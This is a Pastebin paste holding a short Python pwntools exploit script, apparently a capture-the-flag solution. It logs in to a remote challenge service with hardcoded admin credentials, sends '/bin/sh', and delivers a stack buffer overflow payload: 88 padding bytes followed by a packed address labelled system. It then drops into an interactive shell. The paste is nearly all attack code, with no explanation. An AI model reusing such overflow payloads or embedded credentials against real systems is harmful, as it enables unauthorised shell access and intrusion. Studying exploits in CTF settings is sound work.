Advertisement
Guest User

Untitled

a guest
Mar 13th, 2017
93
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.51 KB | None | 0 0
  1. #MtucX
  2. from pwn import *
  3.  
  4.  
  5. #ExecCmd = raw_input("command > ")
  6. #username = "guest"
  7. #password = "guest"
  8. ExecCmd = "/bin/sh"
  9. username = "admin"
  10. password = "T6OBSh2i"
  11.  
  12. system = p64(0x40084a)
  13.  
  14. payload = "A"*88
  15. payload += system
  16.  
  17. #local = remote("127.0.0.1",31337)
  18. pwn = remote('ctf.lse.epita.fr',52190)
  19.  
  20. pwn.sendlineafter(":", username)
  21. pwn.sendlineafter(": ", password)
  22. pwn.sendlineafter(": ", "1")
  23. pwn.sendlineafter(": ", ExecCmd)
  24. pwn.sendlineafter(": ", payload)
  25. pwn.sendlineafter(": ", "3") # exit
  26. pwn.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement